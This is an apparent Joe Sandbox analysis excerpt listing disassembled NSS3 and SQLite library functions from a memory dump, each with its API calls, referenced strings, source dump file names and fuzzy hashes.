PR_NewLock.NSS3 ref: 6C807636
SECMOD_DestroyModule.NSS3(00000000), ref: 6C807686
PR_NewLock.NSS3 ref: 6C8076A2

Part of subcall function 6C8B98D0: calloc.MOZGLUE(00000001,00000084,6C7E0936,00000001,?,6C7E102C), ref: 6C8B98E5

PORT_ZAlloc_Util.NSS3(00000050), ref: 6C8076B6
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sql:,00000004), ref: 6C807707
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,dbm:,00000004), ref: 6C80771C
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,extern:,00000007), ref: 6C807731
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,rdb:,00000004), ref: 6C80774A
DeleteCriticalSection.KERNEL32(?), ref: 6C807770
free.MOZGLUE(?), ref: 6C807779
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C80779A
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C8077AC
PORT_Alloc_Util.NSS3(-0000000D), ref: 6C8077C4
memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C8077DB
strrchr.VCRUNTIME140(?,0000002F), ref: 6C807821
PORT_Alloc_Util.NSS3(?), ref: 6C807837
memcpy.VCRUNTIME140(00000000,00000000,00000000), ref: 6C80785B
memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C80786F
SECMOD_AddNewModuleEx.NSS3 ref: 6C8078AC
free.MOZGLUE(00000000), ref: 6C8078BE
SECMOD_AddNewModuleEx.NSS3 ref: 6C8078F3
free.MOZGLUE(00000000), ref: 6C8078FC
free.MOZGLUE(00000000), ref: 6C80791C

Part of subcall function 6C7E07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C77204A), ref: 6C7E07AD
Part of subcall function 6C7E07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C77204A), ref: 6C7E07CD
Part of subcall function 6C7E07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C77204A), ref: 6C7E07D6
Part of subcall function 6C7E07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C77204A), ref: 6C7E07E4
Part of subcall function 6C7E07A0: TlsSetValue.KERNEL32(00000000,?,6C77204A), ref: 6C7E0864
Part of subcall function 6C7E07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C7E0880
Part of subcall function 6C7E07A0: TlsSetValue.KERNEL32(00000000,?,?,6C77204A), ref: 6C7E08CB
Part of subcall function 6C7E07A0: TlsGetValue.KERNEL32(?,?,6C77204A), ref: 6C7E08D7
Part of subcall function 6C7E07A0: TlsGetValue.KERNEL32(?,?,6C77204A), ref: 6C7E08FB

Strings

rdb:, xrefs: 6C807744
dbm:, xrefs: 6C807716
sql:, xrefs: 6C8076FE
name="%s" parameters="configdir='%s' certPrefix='%s' keyPrefix='%s' secmod='%s' flags=%s updatedir='%s' updateCertPrefix='%s' updateKeyPrefix='%s' updateid='%s' updateTokenDescription='%s' %s" NSS="flags=internal,moduleDB,moduleDBOnly,critical%s", xrefs: 6C8074C7
dll, xrefs: 6C80788E
extern:, xrefs: 6C80772B
kbi., xrefs: 6C807886
,defaultModDB,internalKeySlot, xrefs: 6C80748D, 6C8074AA
Spac, xrefs: 6C807389
NSS Internal Module, xrefs: 6C8074A2, 6C8074C6

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: free$strlen$Value$Alloc_ModuleUtil$CriticalSectionstrncmp$CondEnterUnlockcallocmemcpy$CallDestroyErrorLockNotifyOnce$DeleteInitLoadR_smprintfWaitstrrchr
String ID: ,defaultModDB,internalKeySlot$NSS Internal Module$Spac$dbm:$dll$extern:$kbi.$name="%s" parameters="configdir='%s' certPrefix='%s' keyPrefix='%s' secmod='%s' flags=%s updatedir='%s' updateCertPrefix='%s' updateKeyPrefix='%s' updateid='%s' updateTokenDescription='%s' %s" NSS="flags=internal,moduleDB,moduleDBOnly,critical%s"$rdb:$sql:
API String ID: 3465160547-3797173233
Opcode ID: 6917d53733dfd0d3dcc142a682b942c064e6744cbec371ccd28f37dbeab8c61e
Instruction ID: 1ea1996f96aab7a7e44e1e43846ff9cbfd3072dcee8044aac335169f59944df9
Opcode Fuzzy Hash: 6917d53733dfd0d3dcc142a682b942c064e6744cbec371ccd28f37dbeab8c61e
Instruction Fuzzy Hash: D85213B1F052059BEF219F64CE097AE7BB4BF16308F244828EC09A7B41E770D958CB91

Function 6C816D90 Relevance: 60.3, APIs: 33, Strings: 1, Instructions: 809COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,6C91A8EC,0000006C), ref: 6C816DC6
memcpy.VCRUNTIME140(?,6C91A958,0000006C), ref: 6C816DDB
memcpy.VCRUNTIME140(?,6C91A9C4,00000078), ref: 6C816DF1
memcpy.VCRUNTIME140(?,6C91AA3C,0000006C), ref: 6C816E06
memcpy.VCRUNTIME140(?,6C91AAA8,00000060), ref: 6C816E1C
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C816E38

Part of subcall function 6C89C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C89C2BF

PK11_DoesMechanism.NSS3(?,?), ref: 6C816E76
TlsGetValue.KERNEL32 ref: 6C81726F
EnterCriticalSection.KERNEL32(?), ref: 6C817283

Strings

!, xrefs: 6C817123

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: memcpy$Value$CriticalDoesEnterErrorK11_MechanismSection
String ID: !
API String ID: 3333340300-2657877971
Opcode ID: 308c1d8aa7ec6efc1cdb09e41806fea821ca31035767ec0a46931d76f2e5a072
Instruction ID: a7a9a0d0babfad542f9e4f1f6601e04c56da6d16f3524a1838f94a6620d102e7
Opcode Fuzzy Hash: 308c1d8aa7ec6efc1cdb09e41806fea821ca31035767ec0a46931d76f2e5a072
Instruction Fuzzy Hash: A7728DB5D092199FDB60DF28CD8879ABBF5EB49304F1045ADD84DA7701EB31AA84CF90

Function 6C798460 Relevance: 43.1, APIs: 23, Strings: 1, Instructions: 1095COMMON

Download Yara Rule

APIs

memcmp.VCRUNTIME140(?,00000000,00000030), ref: 6C7984FF
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(377F0682), ref: 6C7988BB
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(002DE218), ref: 6C7988CE
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C7988E2
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(FFFFFFFF), ref: 6C7988F6
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C79894F
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C79895F
sqlite3_randomness.NSS3(00000008,?), ref: 6C798914

Part of subcall function 6C7831C0: sqlite3_initialize.NSS3 ref: 6C7831D6

sqlite3_randomness.NSS3(00000004,?), ref: 6C798A13
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C798A65
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000001), ref: 6C798A6F
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C798B87
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000001), ref: 6C798B94
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(002E5B33), ref: 6C798BAD

Strings

cannot limit WAL size: %s, xrefs: 6C799188

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: _byteswap_ulong$sqlite3_randomness$memcmpsqlite3_initialize
String ID: cannot limit WAL size: %s
API String ID: 2554290823-3503406041
Opcode ID: 4d608c6179496ff9b750891ad06d9ed17e917baefb5bd9acf870d9c0fe8bea81
Instruction ID: dfc9870ee0ced1ffaa0eed7760463eb0b48f1c5fdb8dda28caf29709f52503e0
Opcode Fuzzy Hash: 4d608c6179496ff9b750891ad06d9ed17e917baefb5bd9acf870d9c0fe8bea81
Instruction Fuzzy Hash: 36929F71A08301DFD704CF29D980A5AB7F1FF99318F188A2DE99987761E731E855CB82

Function 6C85AC30 Relevance: 39.5, APIs: 26, Instructions: 539memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?), ref: 6C85ACC4
PORT_ArenaAlloc_Util.NSS3(?,000040F4), ref: 6C85ACD5
memset.VCRUNTIME140(00000000,00000000,000040F4), ref: 6C85ACF3
SEC_ASN1EncodeInteger_Util.NSS3(?,00000018,00000003), ref: 6C85AD3B
SECITEM_CopyItem_Util.NSS3(?,?,00000000), ref: 6C85ADC8
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C85ADDF
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C85ADF0

Part of subcall function 6C89C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C89C2BF

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C85B06A
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C85B08C
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C85B1BA
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C85B27C
memset.VCRUNTIME140(?,00000000,00002010), ref: 6C85B2CA
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C85B3C1
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C85B40C

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: Util$Error$Arena_Free$ArenaItem_memset$Alloc_CopyEncodeInteger_Mark_ValueZfree
String ID:
API String ID: 1285963562-0
Opcode ID: c5b804d27e51a47ac7af65bd4958fa7326de3d318f59b563e2bddb5c412f566a
Instruction ID: 30d84f2eb22f27e33395ece6f559c513cdb73b28749fbf85ef43fb0bf40d8706
Opcode Fuzzy Hash: c5b804d27e51a47ac7af65bd4958fa7326de3d318f59b563e2bddb5c412f566a
Instruction Fuzzy Hash: 2C22A171904300AFE760CF14CE41BA677E1AF9430CF54897CE8595B792E7B2E869CB92

Function 6C7E4420 Relevance: 37.9, APIs: 10, Strings: 11, Instructions: 1186stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C7E4EE3

Strings

a generated column, xrefs: 6C7E4D58, 6C7E4E8B
second, xrefs: 6C7E4BCA
w=~l, xrefs: 6C7E4431, 6C7E4E25, 6C7E533D, 6C7E5536, 6C7E55A0, 6C7E4A83, 6C7E4A99, 6C7E5313, 6C7E5325, 6C7E4CFC, 6C7E4A8C, 6C7E51AC, 6C7E48B9, 6C7E46CD, 6C7E4786, 6C7E48D5, 6C7E490D, 6C7E5404, 6C7E5411, 6C7E541E, 6C7E5365, 6C7E537B, 6C7E536E, 6C7E542A, 6C7E5466, 6C7E53C9, 6C7E5211, 6C7E4BA1, 6C7E5013, 6C7E521D, 6C7E4C69, 6C7E528B, 6C7E4691, 6C7E5058, 6C7E4E5E, 6C7E4FA4, 6C7E4FEB, 6C7E4FDF, 6C7E4F9D, 6C7E4E77, 6C7E4EDF, 6C7E4576, 6C7E4F90
w=~l, xrefs: 6C7E47FB
an index, xrefs: 6C7E4D53, 6C7E4E86
weekday , xrefs: 6C7E54AB
a CHECK constraint, xrefs: 6C7E4D62, 6C7E4D6D, 6C7E4E95, 6C7E4EA0
-, xrefs: 6C7E4FBA
start of , xrefs: 6C7E517A
40f-21a-21d, xrefs: 6C7E44D0
non-deterministic use of %s() in %s, xrefs: 6C7E4D71, 6C7E4EA4

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: strlen
String ID: -$40f-21a-21d$a CHECK constraint$a generated column$an index$non-deterministic use of %s() in %s$second$start of $w=~l$w=~l$weekday
API String ID: 39653677-3009619295
Opcode ID: 94b77c2d9a4f16b4f33e158877f514cf698a9fbffce5dfea22cb3569beb7d9ee
Instruction ID: 3f615d591e5c932cc829a8c131b1fc70b11fbf5608f4f919a1c2004214fd04b7
Opcode Fuzzy Hash: 94b77c2d9a4f16b4f33e158877f514cf698a9fbffce5dfea22cb3569beb7d9ee
Instruction Fuzzy Hash: 40A246326087848FC751CF74C1503A6B7E2AF8E318F14866DE8D99BB42E735D886D742

Function 6C7DECD0 Relevance: 33.8, APIs: 7, Strings: 12, Instructions: 539COMMON

Download Yara Rule

APIs

sqlite3_initialize.NSS3 ref: 6C7DED38

Part of subcall function 6C774F60: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C774FC4

sqlite3_mprintf.NSS3(snippet), ref: 6C7DEF3C
sqlite3_mprintf.NSS3(offsets), ref: 6C7DEFE4

Part of subcall function 6C89DFC0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,00000003,?,6C775001,?,00000003,00000000), ref: 6C89DFD7

sqlite3_mprintf.NSS3(matchinfo), ref: 6C7DF087
sqlite3_mprintf.NSS3(matchinfo), ref: 6C7DF129
sqlite3_mprintf.NSS3(optimize), ref: 6C7DF1D1
sqlite3_free.NSS3(?), ref: 6C7DF368

Strings

fts4, xrefs: 6C7DF2AD
fts3tokenize, xrefs: 6C7DF30F
porter, xrefs: 6C7DED97
unicode61, xrefs: 6C7DEDB5
offsets, xrefs: 6C7DEFAF, 6C7DEFDF, 6C7DF01F
matchinfo, xrefs: 6C7DF04F, 6C7DF082, 6C7DF0C2, 6C7DF0F2, 6C7DF124, 6C7DF169
fts3, xrefs: 6C7DF247
fts3_tokenizer, xrefs: 6C7DEE1A, 6C7DEEA8
snippet, xrefs: 6C7DEF05, 6C7DEF37, 6C7DEF7C
simple, xrefs: 6C7DED79
fts4aux, xrefs: 6C7DECF9
optimize, xrefs: 6C7DF199, 6C7DF1CC, 6C7DF211

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: sqlite3_mprintf$strlen$sqlite3_freesqlite3_initialize
String ID: fts3$fts3_tokenizer$fts3tokenize$fts4$fts4aux$matchinfo$offsets$optimize$porter$simple$snippet$unicode61
API String ID: 2518200370-449611708
Opcode ID: 95d87fe42eae0e33be34c7b6fca8f954d348c43d428eeaa2688410bd561ceac6
Instruction ID: 2719e1010ff543ca174a8112ffe361e5abd74e0ac07a7121d9e77493b2f2d2c2
Opcode Fuzzy Hash: 95d87fe42eae0e33be34c7b6fca8f954d348c43d428eeaa2688410bd561ceac6
Instruction Fuzzy Hash: 0802C5B2B083008BE7049F719A4972B77B56BC570CF2A853DD85A87B00EB74F8568792

Function 6C81A4D0 Relevance: 32.0, APIs: 13, Strings: 5, Instructions: 501stringCOMMON

Download Yara Rule

APIs

PL_strncasecmp.NSS3(6C7F28AD,pkcs11:,00000007), ref: 6C81A501
PORT_Strdup_Util.NSS3(6C7F28AD), ref: 6C81A514

Part of subcall function 6C850F10: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6C7F2AF5,?,?,?,?,?,6C7F0A1B,00000000), ref: 6C850F1A
Part of subcall function 6C850F10: malloc.MOZGLUE(00000001), ref: 6C850F30
Part of subcall function 6C850F10: memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C850F42

strchr.VCRUNTIME140(00000000,0000003A), ref: 6C81A529
PK11_GetInternalKeySlot.NSS3 ref: 6C81A60D
PR_SetError.NSS3(FFFFE041,00000000), ref: 6C81A74B
PR_SetError.NSS3(FFFFE041,00000000), ref: 6C81A777
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C81A80C
memcmp.VCRUNTIME140(?,00000001,00000000), ref: 6C81A82B
CERT_DestroyCertificate.NSS3(00000000), ref: 6C81A952
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C81A9C3

Part of subcall function 6C840960: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000000,?,6C81A8F5,00000000,?,00000010), ref: 6C84097E
Part of subcall function 6C840960: memcmp.VCRUNTIME140(?,00000000,6C81A8F5,00000010), ref: 6C84098D

free.MOZGLUE(00000000), ref: 6C81AB18
strchr.VCRUNTIME140(?,00000040), ref: 6C81AB40
free.MOZGLUE(?), ref: 6C81ABE1

Part of subcall function 6C814170: TlsGetValue.KERNEL32(?,6C7F28AD,00000000,?,6C81A793,?,00000000), ref: 6C81419F
Part of subcall function 6C814170: EnterCriticalSection.KERNEL32(0000001C), ref: 6C8141AF
Part of subcall function 6C814170: PR_Unlock.NSS3(?), ref: 6C8141D4

Strings

object, xrefs: 6C81A5CF
manufacturer, xrefs: 6C81A8A2
pkcs11:, xrefs: 6C81A4FB
token, xrefs: 6C81A875
model, xrefs: 6C81A8CF

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: strlen$Errorfreememcmpstrchr$CertificateCriticalDestroyEnterInternalK11_L_strncasecmpSectionSlotStrdup_UnlockUtilValuemallocmemcpy
String ID: manufacturer$model$object$pkcs11:$token
API String ID: 916065474-709816111
Opcode ID: 1a348f188af39ff489f4dd1d01c3ebfe2a9a158e4748a79190115ac2700fdb2d
Instruction ID: b12936001077d3ffb5fd6874d812ff798db92d1795cbe0c8162d48271309de31
Opcode Fuzzy Hash: 1a348f188af39ff489f4dd1d01c3ebfe2a9a158e4748a79190115ac2700fdb2d
Instruction Fuzzy Hash: 180297B5E042199FEF315B24EE41BDA76B5AF11208F1448B4D80CA6B12FB319E5CCF52

Function 6C7E2560 Relevance: 30.3, APIs: 10, Strings: 7, Instructions: 533stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C77CA30: EnterCriticalSection.KERNEL32(?,?,?,6C7DF9C9,?,6C7DF4DA,6C7DF9C9,?,?,6C7A369A), ref: 6C77CA7A
Part of subcall function 6C77CA30: LeaveCriticalSection.KERNEL32(?), ref: 6C77CB26

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C7E25B2
memset.VCRUNTIME140(00000000,00000000,00000079), ref: 6C7E25DE
sqlite3_snprintf.NSS3(-0000000F,00000068,%s-shm,?), ref: 6C7E2604
sqlite3_initialize.NSS3 ref: 6C7E269D
sqlite3_uri_parameter.NSS3(?,readonly_shm), ref: 6C7E26D6
sqlite3_initialize.NSS3 ref: 6C7E289F
EnterCriticalSection.KERNEL32(?), ref: 6C7E29CD
LeaveCriticalSection.KERNEL32(?), ref: 6C7E2A26
sqlite3_free.NSS3(?), ref: 6C7E2B30

Strings

winShmMap1, xrefs: 6C7E2AB0
readonly_shm, xrefs: 6C7E26CE
winShmMap2, xrefs: 6C7E2BD0
%s-shm, xrefs: 6C7E25FD
winShmMap3, xrefs: 6C7E2C08, 6C7E2C3D
winOpenShm, xrefs: 6C7E2B7E
winFileSize, xrefs: 6C7E2A7D

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeavesqlite3_initialize$memsetsqlite3_freesqlite3_snprintfsqlite3_uri_parameterstrlen
String ID: %s-shm$readonly_shm$winFileSize$winOpenShm$winShmMap1$winShmMap2$winShmMap3
API String ID: 3867263885-4021692097
Opcode ID: 8a0e8c5225a64f28f1f7a4f621f104e82b7b20e16afa1b59bc1189b567f6d44e
Instruction ID: b71e96c3c7052c1fed074e3fc39c60d54a3380f8e80b28fbe5d3dd42039013df
Opcode Fuzzy Hash: 8a0e8c5225a64f28f1f7a4f621f104e82b7b20e16afa1b59bc1189b567f6d44e
Instruction Fuzzy Hash: AE12A072A08202DFDB04DF25D948A6A77B1FF89318F24853DE85997B50EB30EC15CB91

Function 6C7EEF40 Relevance: 23.4, APIs: 10, Strings: 3, Instructions: 629stringmemoryCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C7EEF63

Part of subcall function 6C7F87D0: PORT_NewArena_Util.NSS3(00000800,6C7EEF74,00000000), ref: 6C7F87E8
Part of subcall function 6C7F87D0: PORT_ArenaAlloc_Util.NSS3(00000000,00000008,?,6C7EEF74,00000000), ref: 6C7F87FD
Part of subcall function 6C7F87D0: PORT_ArenaAlloc_Util.NSS3(00000000,00000000), ref: 6C7F884C

PL_strncasecmp.NSS3(oid.,?,00000004), ref: 6C7EF2D4
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C7EF2FC
SEC_StringToOID.NSS3(?,?,?,00000000), ref: 6C7EF30F
SECITEM_AllocItem_Util.NSS3(?,00000000,-00000002), ref: 6C7EF374
PL_strcasecmp.NSS3(6C932FD4,?), ref: 6C7EF457
SECOID_FindOIDByTag_Util.NSS3(00000029), ref: 6C7EF4D2
SECITEM_ZfreeItem_Util.NSS3(00000000,00000000), ref: 6C7EF66E
PR_SetError.NSS3(FFFFE007,00000000), ref: 6C7EF67D
CERT_DestroyName.NSS3(?), ref: 6C7EF68B

Part of subcall function 6C7F8320: PORT_ArenaAlloc_Util.NSS3(0000002A,00000018), ref: 6C7F8338
Part of subcall function 6C7F8320: SECOID_FindOIDByTag_Util.NSS3(?), ref: 6C7F8364
Part of subcall function 6C7F8320: PORT_ArenaAlloc_Util.NSS3(0000002A,?), ref: 6C7F838E
Part of subcall function 6C7F8320: memcpy.VCRUNTIME140(00000000,?,?), ref: 6C7F83A5
Part of subcall function 6C7F8320: PR_SetError.NSS3(FFFFE005,00000000), ref: 6C7F83E3

Part of subcall function 6C7F84C0: PORT_ArenaAlloc_Util.NSS3(00000000,00000004,00000000,00000000), ref: 6C7F84D9
Part of subcall function 6C7F84C0: PORT_ArenaAlloc_Util.NSS3(00000000,00000000), ref: 6C7F8528

Part of subcall function 6C7F8900: PORT_ArenaGrow_Util.NSS3(00000000,?,00000000,?,00000000,?,00000000,?,6C7EF599,?,00000000), ref: 6C7F8955

Strings

", xrefs: 6C7EF21B
*, xrefs: 6C7EF3C6
oid., xrefs: 6C7EF2CF

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: Util$Arena$Alloc_$ErrorFindItem_Tag_strlen$AllocArena_DestroyGrow_L_strcasecmpL_strncasecmpNameStringZfreememcpy
String ID: "$*$oid.
API String ID: 4161946812-2398207183
Opcode ID: 277fb090c7a7f5c1ab4f6bcfff1fe40843c3fd1d7383438545a8dbab12bd0401
Instruction ID: 2229f56bf8aa8e457782f6e2c21f4af54a806df54843902e27b8a7b2aa692022
Opcode Fuzzy Hash: 277fb090c7a7f5c1ab4f6bcfff1fe40843c3fd1d7383438545a8dbab12bd0401
Instruction Fuzzy Hash: 21222A736083414BD714CE28E69076AB7E6ABDD358F188A3EE49587F92E7319C05C743

Function 6C84A5E0 Relevance: 23.1, APIs: 15, Instructions: 574COMMON

Download Yara Rule

Memory Dump Source

